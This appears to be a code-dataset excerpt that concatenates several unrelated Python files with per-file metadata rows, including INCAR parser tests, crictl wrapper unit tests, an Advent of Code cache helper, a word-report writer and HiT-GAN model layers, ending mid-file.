response = requests.post(
self._base_url + '/ddo/query',
data=json.dumps(search_query),
headers=self._headers
).content
if not response:
return {}
try:
parsed_response = json.loads(response)
except TypeError:
parsed_response = None
if parsed_response is None:
return []
elif isinstance(parsed_response, list):
return parsed_response
else:
raise ValueError('Unknown search response, expecting a list got "%s.' % type(parsed_response))
def retire_asset_metadata(self, asset_did):
response = requests.delete(self._base_url + '/ddo/%s' % asset_did, headers=self._headers)
logging.debug("Removed asset DID: {} from metadata store".format(asset_did))
return response
| 35.61157 | 116 | 0.616152 | 507 | 4,309 | 5.04142 | 0.209073 | 0.087637 | 0.04734 | 0.043818 | 0.563772 | 0.5223 | 0.457746 | 0.286776 | 0.258607 | 0.258607 | 0 | 0.007386 | 0.277327 | 4,309 | 120 | 117 | 35.908333 | 0.813423 | 0.024368 | 0 | 0.467391 | 0 | 0 | 0.134468 | 0.017018 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108696 | false | 0 | 0.032609 | 0.032609 | 0.326087 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0baca0b9e9638a98e7c01ff2d15f7a1ae56b3423 | 3,843 | py | Python | aiida_vasp/parsers/content_parsers/tests/test_incar_parser.py | DropD/aiida_vasp | 9967f5501a6fc1c67981154068135cec7be5396a | [
"MIT"
] | 3 | 2016-11-18T07:19:57.000Z | 2016-11-28T08:28:38.000Z | aiida_vasp/parsers/content_parsers/tests/test_incar_parser.py | DropD/aiida_vasp | 9967f5501a6fc1c67981154068135cec7be5396a | [
"MIT"
] | null | null | null | aiida_vasp/parsers/content_parsers/tests/test_incar_parser.py | DropD/aiida_vasp | 9967f5501a6fc1c67981154068135cec7be5396a | [
"MIT"
] | null | null | null | """Test the INCAR parser."""
# pylint: disable=redefined-outer-name, unused-wildcard-import, unused-argument, wildcard-import
import pytest
from aiida_vasp.utils.fixtures import *
from aiida_vasp.parsers.content_parsers.incar import IncarParser
from aiida_vasp.utils.aiida_utils import get_data_node
compare_incar = {'gga': 'PE', 'gga_compat': False, 'lorbit': 11, 'magmom': '30 * 2*0.', 'sigma': 0.5}
@pytest.mark.parametrize(['incar_parser'], [('incar',)], indirect=True)
def test_parse_incar(incar_parser):
"""Load a reference INCAR parser.
We check that it parses and provides the correct content for the default INCAR.
"""
# The structure for the INCAR parser should have the key `incar-structure`
result = incar_parser.get_quantity('incar')
assert result == compare_incar
@pytest.mark.parametrize(['incar_parser'], [('phonondb',)], indirect=True)
def test_parse_incar_phonon(incar_parser):
"""Load a reference INCAR parser.
We check that it parses and provides the correct content for an INCAR used for
phonon calculations.
"""
incar = incar_parser.incar
assert incar['prec'] == 'Accurate'
assert incar['ibrion'] == -1
assert incar['encut'] == pytest.approx(359.7399)
assert incar['lreal'] is False
@pytest.mark.parametrize(['incar_parser'], [('incar',)], indirect=True)
def test_parse_incar_write(incar_parser, tmpdir):
"""Load a reference INCAR parser and check that the write functionality works.
Here we make sure the write function of the content parser works.
"""
# Write the loaded structure to file
temp_path = str(tmpdir.join('INCAR'))
incar_parser.write(temp_path)
# Load the written structure using a new content parser instance
content = None
with open(temp_path, 'r', encoding='utf8') as handler:
content = handler.readlines()
ref_content = ['GGA = PE\n', 'GGA_COMPAT = .FALSE.\n', 'LORBIT = 11\n', 'MAGMOM = 30 * 2*0.\n', 'SIGMA = 0.5\n']
assert content == ref_content
def test_parse_incar_data(vasp_params, tmpdir):
"""Load a reference AiiDA Dict and check that the parser can
initialize using the data.
Using the Dict sitting in the initialized parser it should
write that content to an INCAR file when issuing write which is also tested,
file is reloaded and content checked.
"""
# Initialize parser with an existing reference Dict
incar_parser = IncarParser(data=vasp_params)
# Check that get_quantity return the same Dict instance
assert vasp_params == incar_parser.get_quantity('key_does_not_matter')
# Write the loaded Dict to file, which behind the scenes convert it
# to a INCAR format
temp_path = str(tmpdir.join('INCAR'))
incar_parser.write(temp_path)
# Load the written INCAR using a new content parser instance
parser = None
with open(temp_path, 'r', encoding='utf8') as handler:
parser = IncarParser(handler=handler)
result = parser.get_quantity('incar')
assert vasp_params.get_dict() == result
@pytest.mark.parametrize(['incar_parser'], [(['incar', 'INCAR.nohash'],)], indirect=True)
def test_parse_incar_nohash(incar_parser):
"""Load a reference INCAR parser.
Using parsevasp. Returned content should be None
since parsevasp refuse to parse an INCAR where the
comments does not start with hashtags.
"""
result = incar_parser.incar
assert result is None
def test_parse_incar_invalid_tag(vasp_params, tmpdir):
"""Test parsing an INCAR with an invalid tag."""
params = vasp_params.get_dict()
params.update(foo='bar')
vasp_params_modified = get_data_node('dict', dict=params)
parser = IncarParser(data=vasp_params_modified)
temp_path = str(tmpdir.join('INCAR'))
with pytest.raises(SystemExit):
parser.write(temp_path)
| 34.00885 | 116 | 0.710903 | 537 | 3,843 | 4.947858 | 0.284916 | 0.08694 | 0.027098 | 0.038389 | 0.341739 | 0.275875 | 0.207753 | 0.194204 | 0.194204 | 0.194204 | 0 | 0.008283 | 0.18319 | 3,843 | 112 | 117 | 34.3125 | 0.838165 | 0.363518 | 0 | 0.191489 | 0 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0.191489 | 1 | 0.12766 | false | 0 | 0.085106 | 0 | 0.212766 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0bad23704f0d73d672d26d8a3ad2319bd057edf0 | 9,555 | py | Python | salt/tests/unit/modules/test_cri.py | SaintLoong/metalk8s | 06fa3a731f35ab0f9ad8d3443fd8f8c4e7037432 | [
"Apache-2.0"
] | 23 | 2018-03-16T09:06:46.000Z | 2018-08-02T00:02:07.000Z | salt/tests/unit/modules/test_cri.py | SaintLoong/metalk8s | 06fa3a731f35ab0f9ad8d3443fd8f8c4e7037432 | [
"Apache-2.0"
] | 131 | 2018-03-13T07:31:34.000Z | 2018-08-02T21:57:18.000Z | salt/tests/unit/modules/test_cri.py | SaintLoong/metalk8s | 06fa3a731f35ab0f9ad8d3443fd8f8c4e7037432 | [
"Apache-2.0"
] | 4 | 2018-04-03T07:18:39.000Z | 2018-07-02T22:56:56.000Z | import json
from unittest import TestCase
from unittest.mock import MagicMock, patch
from parameterized import parameterized
from _modules import cri
from tests.unit import mixins
from tests.unit import utils
IMAGES_LIST = [
{
"id": "sha256:da86e6ba6ca197bf6bc5e9d900febd906b133eaa4750e6bed647b0fbe50ed43e",
"repoTags": ["k8s.gcr.io/pause:3.1"],
"repoDigests": [],
"size": "746400",
"uid": None,
"username": "",
},
{
"id": "sha256:2c4adeb21b4ff8ed3309d0e42b6b4ae39872399f7b37e0856e673b13c4aba13d",
"repoTags": [
"metalk8s-registry-from-config.invalid/metalk8s-2.4.2/etcd:3.3.10",
"myEtcdTag",
],
"repoDigests": [
"metalk8s-registry-from-config.invalid/metalk8s-2.4.2/etcd@sha256:240bd81c2f54873804363665c5d1a9b8e06ec5c63cfc181e026ddec1d81585bb"
],
"size": "76160693",
"uid": None,
"username": "",
},
]
COMPONENT_LIST = [
{
"id": "225a77f7ef0df4347ac7ac81a351f3b122b592cbbee62e157061cf28a811ac45",
"metadata": {
"name": "etcd-bootstrap",
"uid": "f556b9016283651c92291c6d844ea468",
"namespace": "kube-system",
"attempt": 2,
},
"state": "SANDBOX_READY",
"createdAt": "1593676785281403260",
"labels": {
"component": "etcd",
"io.kubernetes.pod.name": "etcd-bootstrap",
"io.kubernetes.pod.namespace": "kube-system",
"io.kubernetes.pod.uid": "f556b9016283651c92291c6d844ea468",
"metalk8s.scality.com/version": "2.5.1-dev",
"tier": "control-plane",
},
"annotations": {
"kubernetes.io/config.hash": "f556b9016283651c92291c6d844ea468",
"kubernetes.io/config.seen": "2020-07-02T07:59:42.325844296Z",
"kubernetes.io/config.source": "file",
"scheduler.alpha.kubernetes.io/critical-pod": "",
},
}
]
class CriTestCase(TestCase, mixins.LoaderModuleMockMixin):
"""
TestCase for `cri` module
"""
loader_module = cri
def test_virtual(self):
"""
Tests the return of `__virtual__` function
"""
self.assertEqual(cri.__virtual__(), "cri")
@parameterized.expand(
[
(0, json.dumps({"images": IMAGES_LIST}, indent=4), IMAGES_LIST),
(1, "this command failed", None),
(0, json.dumps({"images": []}, indent=4), []),
]
)
def test_list_image(self, retcode, stdout, result):
"""
Tests the return of `list_images` function
"""
cmd = utils.cmd_output(retcode=retcode, stdout=stdout)
mock_cmd = MagicMock(return_value=cmd)
with patch.dict(cri.__salt__, {"cmd.run_all": mock_cmd}):
self.assertEqual(cri.list_images(), result)
mock_cmd.assert_called_once_with("crictl images -o json")
@parameterized.expand(
[
(IMAGES_LIST, "k8s.gcr.io/pause:3.1", True),
(
IMAGES_LIST,
"metalk8s-registry-from-config.invalid/metalk8s-2.4.2/etcd:3.3.10",
True,
),
(IMAGES_LIST, "myEtcdTag", True),
(
IMAGES_LIST,
"metalk8s-registry-from-config.invalid/metalk8s-2.4.2/etcd@sha256:240bd81c2f54873804363665c5d1a9b8e06ec5c63cfc181e026ddec1d81585bb",
True,
),
(IMAGES_LIST, "Abc", False),
(None, "k8s.gcr.io/pause:3.1", False),
([], "k8s.gcr.io/pause:3.1", False),
]
)
def test_available(self, images_list, name, result):
"""
Tests the return of `available` function
"""
with patch.object(cri, "list_images", MagicMock(return_value=images_list)):
self.assertEqual(cri.available(name), result)
@parameterized.expand(
[
(
0,
"Image is up to date for sha256:2bd222736f60f13a760bcfcc0728e4bd0812169d9d3068c01319c72102c9972a",
{
"digests": {
"sha256": "2bd222736f60f13a760bcfcc0728e4bd0812169d9d3068c01319c72102c9972a"
}
},
),
(1, "", None),
(0, "Not expected result", {"digests": {}}),
]
)
def test_pull_image(self, retcode, stdout, result):
"""
Tests the return of `pull_image` function
"""
cmd = utils.cmd_output(retcode=retcode, stdout=stdout)
mock_cmd = MagicMock(return_value=cmd)
with patch.dict(cri.__salt__, {"cmd.run_all": mock_cmd}):
self.assertEqual(cri.pull_image("my-images"), result)
mock_cmd.assert_called_once_with('crictl pull "my-images"')
@parameterized.expand(
[
(0, "292c3b07b", 0, "All ok", "All ok"),
(1, "292c3b07b", 0, "All ok", None),
(0, "", 0, "All ok", None),
(0, "292c3b07b", 1, "All not ok", None),
(0, "292c3b07b", 0, "", ""),
]
)
def test_execute(self, ret_ps, stdout_ps, ret_exec, stdout_exec, result):
"""
Tests the return of `execute` function
"""
cmd_ps = utils.cmd_output(retcode=ret_ps, stdout=stdout_ps)
cmd_exec = utils.cmd_output(retcode=ret_exec, stdout=stdout_exec)
def _cmd_run_all_mock(cmd):
if "crictl ps" in cmd:
return cmd_ps
elif "crictl exec" in cmd:
return cmd_exec
return None
mock_cmd = MagicMock(side_effect=_cmd_run_all_mock)
with patch.dict(cri.__salt__, {"cmd.run_all": mock_cmd}):
self.assertEqual(cri.execute("my_cont", "my command"), result)
mock_cmd.assert_any_call(
'crictl ps -q --label io.kubernetes.container.name="my_cont"'
)
if ret_ps == 0 and stdout_ps:
mock_cmd.assert_called_with(
"crictl exec {} my command ".format(stdout_ps)
)
@parameterized.expand(
[
# Success: Found one container
(None, 6, 0, "292c3b07b", True),
# Failure: Container does not exist
(
None,
6,
0,
"",
'Failed to find container "my_cont": No container found',
True,
),
# Failure: Error occurred when executing crictl command
(
None,
6,
1,
"Error occurred",
'Failed to find container "my_cont": Error occurred',
True,
),
# Success: Found one running container
("running", 6, 0, "292c3b07b", True),
# Failure: Container does not exist or is not running
(
"running",
6,
0,
"",
'Failed to find container "my_cont" in state "running": No container found',
True,
),
# Failure: Error occurred when executing crictl command
(
"running",
6,
1,
"Error occurred",
'Failed to find container "my_cont" in state "running": Error occurred',
True,
),
]
)
def test_wait_container(
self, state, timeout, retcode, stdout, result, raises=False
):
"""
Tests the return of `wait_container` function
"""
cmd = utils.cmd_output(retcode=retcode, stdout=stdout)
mock_cmd = MagicMock(return_value=cmd)
with patch.dict(cri.__salt__, {"cmd.run_all": mock_cmd}), patch(
"time.sleep", MagicMock()
):
if raises:
self.assertRaisesRegex(
Exception,
result,
cri.wait_container,
"my_cont",
state=state,
timeout=timeout,
)
else:
self.assertEqual(
cri.wait_container("my_cont", state=state, timeout=timeout), result
)
cmd_call = 'crictl ps -q --label io.kubernetes.container.name="my_cont"'
if state:
cmd_call += " --state {}".format(state)
mock_cmd.assert_called_with(cmd_call)
@parameterized.expand(
[
(0, json.dumps({"items": COMPONENT_LIST}, indent=4), True),
(1, "this command failed", False),
(0, json.dumps({"items": []}, indent=4), False),
]
)
def test_component_is_running(self, retcode, stdout, result):
"""
Tests the return of `component_is_running` function
"""
cmd = utils.cmd_output(retcode=retcode, stdout=stdout)
mock_cmd = MagicMock(return_value=cmd)
with patch.dict(cri.__salt__, {"cmd.run_all": mock_cmd}):
self.assertEqual(cri.component_is_running("my_comp"), result)
@parameterized.expand([(0, True), (1, False)])
def test_ready(self, retcode, result):
"""
Tests the return of `ready` function
"""
mock_cmd = MagicMock(return_value=retcode)
with patch.dict(cri.__salt__, {"cmd.retcode": mock_cmd}):
self.assertEqual(cri.ready(), result)
| 34.247312 | 148 | 0.531554 | 919 | 9,555 | 5.357998 | 0.199129 | 0.025589 | 0.022746 | 0.025995 | 0.435418 | 0.372868 | 0.362104 | 0.353981 | 0.339764 | 0.256296 | 0 | 0.087981 | 0.346939 | 9,555 | 278 | 149 | 34.370504 | 0.701122 | 0.065829 | 0 | 0.266667 | 0 | 0.017778 | 0.264649 | 0.131407 | 0 | 0 | 0 | 0 | 0.062222 | 1 | 0.04 | false | 0 | 0.031111 | 0 | 0.093333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0baf5d1709dd6b0d9d4aa7b5ca119e04b576dfc4 | 3,681 | py | Python | advent_of_code/cache_file.py | fossabot/advent-of-code-2 | e39ee7c4642dc76dc04d02b8ae0f0f622fd9adc4 | [
"MIT"
] | null | null | null | advent_of_code/cache_file.py | fossabot/advent-of-code-2 | e39ee7c4642dc76dc04d02b8ae0f0f622fd9adc4 | [
"MIT"
] | null | null | null | advent_of_code/cache_file.py | fossabot/advent-of-code-2 | e39ee7c4642dc76dc04d02b8ae0f0f622fd9adc4 | [
"MIT"
] | null | null | null | """ Module which performs cache file related operation stored over CACHE_DIR of OS"""
import os
import time
from pathlib import Path
import appdirs
def check_if_downloaded(year, day, session):
"""Check if an input is downloaded and cached or not in cache location"""
cache_file = _join_path(year, day, session, input_file=True)
cache_file = Path(cache_file)
return cache_file.exists()
def save_input_to_location(year, day, session, input_data):
"""Save a input to its cache location for future reference and use"""
cache_folder = _join_path(year, day, session)
Path(cache_folder).mkdir(parents=True, exist_ok=True)
cache_file = os.path.join(cache_folder, "input.txt")
with open(cache_file, "w+") as opened_file:
opened_file.write(input_data)
def delete_input(year, day, session):
"""Delete input from a cache folder"""
cache_file = _join_path(year, day, session, input_file=True)
if Path(cache_file).exists():
os.remove(cache_file)
def cache_file_data(year, day, session):
"""Return cache file input data from cache folder for certain problem"""
from .server_action import download_input
download_input(year, day, session)
cache_file = _join_path(year, day, session, input_file=True)
with open(cache_file) as opened_file:
input_data = opened_file.read()
return input_data
def save_submitted_answer(year, day, part, session, output, message):
"""Save submitted input to file of problem"""
submitted_file = _join_path(year, day, session, submission=True)
with open(submitted_file, "a") as opened_file:
opened_file.write("{}!{}:{}\n".format(part, output, message))
def last_submitted_answer_message(year, day, part, session, output):
"""
Check if answer is already submitted by user if submitted return message of last
submission
"""
submission_file = _join_path(year, day, session, submission=True)
last_answer_message = None
with open(submission_file, "r") as opened_file:
lines = opened_file.read()
for line in lines:
seprate_part = line.split("!", 1)
if seprate_part[0] == part:
seprate_output = seprate_part[1].split(":", 1)
if seprate_output == output:
last_answer_message = seprate_output[1]
return last_answer_message
def save_last_submission_time(year, day, session):
"""Save a time where a request is performed for last submission"""
last_time_file = _join_path(year, day, session, last_file=True)
with open(last_time_file, "w") as opened_file:
opened_file.write(str(time.time()))
def check_less_than_one_min_submission(year, day, session):
"""
Check last submission time for solution return true if time is less than 60 second
"""
last_time_file = _join_path(year, day, session, last_file=True)
with open(last_time_file, "r") as opened_file:
last_time = float(opened_file.read())
current_time = time.time()
early_submission = current_time - last_time < 60.0
return early_submission
def _join_path(year, day, session, input_file=False, submission=False, last_file=False):
"""Return out desire path for a config folders and files"""
cache_location = appdirs.user_cache_dir(appname="advent-of-code")
cache_file = os.path.join(cache_location, str(session), str(year), str(day))
if input_file:
cache_file = os.path.join(cache_file, "input.txt")
if submission:
cache_file = os.path.join(cache_file, "submission.txt")
if last_file:
cache_file = os.path.join(cache_file, "time.txt")
return cache_file
| 37.561224 | 88 | 0.697908 | 530 | 3,681 | 4.611321 | 0.207547 | 0.081015 | 0.091653 | 0.055237 | 0.287234 | 0.246318 | 0.21563 | 0.191489 | 0.10802 | 0.10802 | 0 | 0.003393 | 0.199402 | 3,681 | 97 | 89 | 37.948454 | 0.825925 | 0.173866 | 0 | 0.080645 | 0 | 0 | 0.024283 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.145161 | false | 0 | 0.080645 | 0 | 0.306452 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0bb0f397622a9e3207cdf5137d3ce4743a15d1c7 | 2,149 | py | Python | wordsfinder/report_writers.py | ravique/otus-homework1 | 67daeba3b46c8a0cb078abf84abafbf8d736e297 | [
"MIT"
] | 1 | 2020-07-12T13:24:21.000Z | 2020-07-12T13:24:21.000Z | wordsfinder/report_writers.py | ravique/otus-homework1 | 67daeba3b46c8a0cb078abf84abafbf8d736e297 | [
"MIT"
] | null | null | null | wordsfinder/report_writers.py | ravique/otus-homework1 | 67daeba3b46c8a0cb078abf84abafbf8d736e297 | [
"MIT"
] | null | null | null | import os
import csv
import json
import datetime
def compose_report_name(file_format: str) -> str:
file_name = f'{datetime.datetime.now().date()}-report.{file_format}'
counter = 1
while os.path.isfile(f'./{file_name}'):
file_name = f'{datetime.datetime.now().date()}-{counter}-report.{file_format}'
counter += 1
return file_name
def write_report_to_console(words: dict, total_words_counter: int, unique_words_counter: int) -> None:
print('total %s words, %s unique' % (total_words_counter, unique_words_counter))
if words and total_words_counter != 0:
for word_type, counted_words in words.items():
print('---------------------')
print(f'Word type {word_type}:')
for word, occurrence in counted_words.items():
print(f'{word} – {occurrence} times')
else:
print('No words found')
def write_report_to_csv(words: dict, total_words_counter: int, unique_words_counter: int) -> bool:
csv_file_name = compose_report_name('csv')
with open(csv_file_name, 'a', newline='', encoding='utf-8') as report_file:
report_writer = csv.writer(report_file, delimiter=';')
report_writer.writerow(('total %s words, %s unique' % (total_words_counter, unique_words_counter),))
if words:
for word_type, counted_words in words.items():
report_writer.writerow((word_type,))
for word, occurrence in counted_words.items():
report_writer.writerow((word, occurrence))
else:
report_writer.writerow('No words found')
return True
def write_report_to_json(words: dict, total_words_counter: int, unique_words_counter: int) -> bool:
report_dict = dict()
report_dict['general_report'] = {'total_words': total_words_counter, 'unique_words': unique_words_counter}
if words:
report_dict['words_report'] = words
json_file_name = compose_report_name('json')
with open(json_file_name, 'w', newline='', encoding='utf-8') as report_json_file:
json.dump(report_dict, report_json_file, indent=4)
return True
| 34.66129 | 110 | 0.659842 | 284 | 2,149 | 4.704225 | 0.228873 | 0.116766 | 0.089072 | 0.035928 | 0.560629 | 0.447605 | 0.374252 | 0.326347 | 0.273952 | 0.208084 | 0 | 0.00354 | 0.211261 | 2,149 | 61 | 111 | 35.229508 | 0.784071 | 0 | 0 | 0.232558 | 0 | 0 | 0.161005 | 0.063751 | 0 | 0 | 0 | 0 | 0 | 1 | 0.093023 | false | 0 | 0.093023 | 0 | 0.255814 | 0.116279 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0bb80b23f6b766d35d6297d8ff1e8c81ed006284 | 14,967 | py | Python | models/layers.py | google-research/hit-gan | b7671bc9215056632dd0b4cb7701bcf644ec3ad0 | [
"Apache-2.0"
] | 67 | 2021-12-24T00:39:24.000Z | 2022-03-31T04:24:53.000Z | models/layers.py | google-research/hit-gan | b7671bc9215056632dd0b4cb7701bcf644ec3ad0 | [
"Apache-2.0"
] | 1 | 2022-02-28T12:58:28.000Z | 2022-03-01T11:34:41.000Z | models/layers.py | google-research/hit-gan | b7671bc9215056632dd0b4cb7701bcf644ec3ad0 | [
"Apache-2.0"
] | 4 | 2022-01-04T09:16:32.000Z | 2022-03-15T22:39:32.000Z | # coding=utf-8
# Copyright 2021 The HiT-GAN Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific HiT-GAN governing permissions and
# limitations under the License.
# ==============================================================================
"""Model layers for HiT-GAN."""
import math
import string
from typing import Any, Callable, List, Optional, Text
import numpy as np
import tensorflow as tf
_CHR_IDX = string.ascii_lowercase
def _build_attention_equation(rank, attn_axes):
"""Builds einsum equations for the attention computation.
Query, key, value inputs after projection are expected to have the shape as:
(bs, <non-attention dims>, <attention dims>, num_heads, channels).
bs and <non-attention dims> are treated as <batch dims>.
The attention operations can be generalized:
(1) Query-key dot product:
(<batch dims>, <query attention dims>, num_heads, channels), (<batch dims>,
<key attention dims>, num_heads, channels) -> (<batch dims>,
num_heads, <query attention dims>, <key attention dims>)
(2) Combination:
(<batch dims>, num_heads, <query attention dims>, <key attention dims>),
(<batch dims>, <value attention dims>, num_heads, channels) -> (<batch dims>,
<query attention dims>, num_heads, channels)
Args:
rank: the rank of query, key, value tensors.
attn_axes: a list/tuple of axes, [-1, rank), that will do attention.
Returns:
Einsum equations.
"""
target_notation = _CHR_IDX[:rank]
# `batch_dims` includes the head dim.
batch_dims = tuple(np.delete(range(rank), attn_axes + (rank - 1,)))
letter_offset = rank
source_notation = ""
for i in range(rank):
if i in batch_dims or i == rank - 1:
source_notation += target_notation[i]
else:
source_notation += _CHR_IDX[letter_offset]
letter_offset += 1
product_notation = "".join([target_notation[i] for i in batch_dims] +
[target_notation[i] for i in attn_axes] +
[source_notation[i] for i in attn_axes])
dot_product_equation = "%s,%s->%s" % (source_notation, target_notation,
product_notation)
attn_scores_rank = len(product_notation)
combine_equation = "%s,%s->%s" % (product_notation, source_notation,
target_notation)
return dot_product_equation, combine_equation, attn_scores_rank
def _build_proj_equation(free_dims, bound_dims, output_dims):
"""Builds an einsum equation for projections inside multi-head attention."""
input_str = ""
kernel_str = ""
output_str = ""
bias_axes = ""
letter_offset = 0
for i in range(free_dims):
char = _CHR_IDX[i + letter_offset]
input_str += char
output_str += char
letter_offset += free_dims
for i in range(bound_dims):
char = _CHR_IDX[i + letter_offset]
input_str += char
kernel_str += char
letter_offset += bound_dims
for i in range(output_dims):
char = _CHR_IDX[i + letter_offset]
kernel_str += char
output_str += char
bias_axes += char
equation = "%s,%s->%s" % (input_str, kernel_str, output_str)
return equation, bias_axes, len(output_str)
def _get_output_shape(output_rank, known_last_dims):
return [None] * (output_rank - len(known_last_dims)) + list(known_last_dims)
def make_norm_layer(
norm_type: Optional[Text] = "batch") -> tf.keras.layers.Layer:
"""Makes the normalization layer.
Args:
norm_type: A string for the type of normalization.
Returns:
A `tf.keras.layers.Layer` instance.
"""
if norm_type is None:
return tf.keras.layers.Layer() # Identity.
elif norm_type == "batch":
return tf.keras.layers.BatchNormalization()
elif norm_type == "syncbatch":
return tf.keras.layers.experimental.SyncBatchNormalization()
elif norm_type == "layer":
return tf.keras.layers.LayerNormalization(epsilon=1e-6)
else:
raise ValueError("{} is not a recognized norm type".format(norm_type))
class PositionEmbedding(tf.keras.layers.Layer):
"""Defines learnable positional embeddings."""
def build(self, input_shape: tf.TensorShape) -> None:
input_dim = input_shape[-1]
input_height = input_shape[-3]
input_width = input_shape[-2]
self.embedding_weight = self.add_weight(
"embedding_weight",
shape=(1, input_height, input_width, input_dim),
initializer=tf.keras.initializers.TruncatedNormal(stddev=0.02),
trainable=True)
super().build(input_shape)
def call(self, inputs: tf.Tensor) -> tf.Tensor:
return inputs + self.embedding_weight
class SkipToRGB(tf.keras.layers.Layer):
"""Converts skip inputs to RGB images."""
def __init__(self,
output_dim: int = 3,
norm_type: Text = "layer",
kernel_initializer="glorot_uniform",
bias_initializer="zeros",
**kwargs: Any) -> None:
"""Initializer.
Args:
output_dim: An integer for the output channel dimension.
norm_type: A string for the type of normalization.
kernel_initializer: Initialization function of dense kenrels.
bias_initializer: Initialization function of dense biases.
**kwargs: Additional arguments for `tf.keras.layers.Layer`.
"""
super().__init__(**kwargs)
self.output_layer = tf.keras.Sequential([
make_norm_layer(norm_type),
tf.keras.layers.Dense(
output_dim,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer)
])
self.upsample = tf.keras.layers.UpSampling2D()
def call(self,
inputs: tf.Tensor,
skip_inputs: Optional[tf.Tensor],
training: Optional[bool] = None) -> tf.Tensor:
outputs = self.output_layer(inputs, training=training)
if skip_inputs is not None:
skip_outputs = self.upsample(skip_inputs)
outputs = skip_outputs + outputs
return outputs
class PixelShuffle(tf.keras.layers.Layer):
"""Up-sampling layer using pixel shuffle."""
def __init__(self,
output_dim: int,
kernel_initializer="glorot_uniform",
bias_initializer="zeros",
**kwargs: Any) -> None:
"""Initializer.
Args:
output_dim: An integer for the output channel dimension.
kernel_initializer: Initialization function of dense kenrels.
bias_initializer: Initialization function of dense biases.
**kwargs: Additional arguments for `tf.keras.layers.Layer`.
"""
super().__init__(**kwargs)
self._output_dim = output_dim
self._kernel_initializer = kernel_initializer
self._bias_initializer = bias_initializer
def build(self, input_shape: tf.TensorShape) -> None:
if input_shape[-1] // 4 == self._output_dim:
self.dense_layer = None
else:
self.dense_layer = tf.keras.layers.Dense(
self._output_dim,
kernel_initializer=self._kernel_initializer,
bias_initializer=self._bias_initializer)
super().build(input_shape)
def call(self, inputs: tf.Tensor) -> tf.Tensor:
outputs = tf.nn.depth_to_space(inputs, 2)
if self.dense_layer is not None:
outputs = self.dense_layer(outputs)
return outputs
class MLP(tf.keras.layers.Layer):
"""Defines MLP layer with normalization and residual connection."""
def __init__(self,
expansion: int = 4,
dropout: float = 0.,
norm_type: Text = "batch",
activation: Callable[..., tf.Tensor] = tf.nn.relu,
kernel_initializer="glorot_uniform",
bias_initializer="zeros",
**kwargs: Any) -> None:
"""Initializer.
Args:
expansion: An integer for the expansion ratio of the hidden dimension.
dropout: A float for the dropout rate after dense layers.
norm_type: A string for the type of normalization.
activation: Activation function.
kernel_initializer: Initialization function of dense kenrels.
bias_initializer: Initialization function of dense biases.
**kwargs: Additional arguments for `tf.keras.layers.Layer`.
"""
super().__init__(**kwargs)
self._expansion = expansion
self._dropout = dropout
self._norm_type = norm_type
self._activation = activation
self._kernel_initializer = kernel_initializer
self._bias_initializer = bias_initializer
def build(self, input_shape: tf.TensorShape) -> None:
input_dim = input_shape[-1]
common_kwargs = dict(
kernel_initializer=self._kernel_initializer,
bias_initializer=self._bias_initializer)
self.norm_layer = make_norm_layer(self._norm_type)
self.mlp_block = tf.keras.Sequential([
tf.keras.layers.Dense(
input_dim * self._expansion,
activation=self._activation,
**common_kwargs),
tf.keras.layers.Dropout(self._dropout),
tf.keras.layers.Dense(input_dim, **common_kwargs),
tf.keras.layers.Dropout(self._dropout)
])
super().build(input_shape)
def call(self,
inputs: tf.Tensor,
training: Optional[bool] = None) -> tf.Tensor:
outputs = self.norm_layer(inputs, training=training)
outputs = self.mlp_block(outputs, training=training)
return outputs + inputs
class MultiAxisAttention(tf.keras.layers.Layer):
"""MultiAxisAttention performs attentions along multiple axes."""
def __init__(self,
num_heads: int,
key_dim: int,
attn_axes: List[List[int]],
attn_type: Text = "multi_head",
use_bias: bool = True,
dropout: float = 0.0,
kernel_initializer="glorot_uniform",
bias_initializer="zeros",
**kwargs: Any) -> None:
"""Initializer.
Args:
num_heads: An integer for the number of attention heads.
key_dim: An integer for the size of each attention head.
attn_axes: A list for the list of axes over which the attention is
applied.
attn_type: A string for attention type ("multi_head" or "multi_query").
use_bias: A boolean for whether the dense layers use biases.
dropout: A float for the dropout rate after dense layers.
kernel_initializer: Initialization function of dense kenrels.
bias_initializer: Initialization function of dense biases.
**kwargs: Additional arguments for `tf.keras.layers.Layer`.
"""
super().__init__(**kwargs)
self._num_heads = num_heads
self._key_dim = key_dim
self._attn_axes = attn_axes
self._attn_type = attn_type
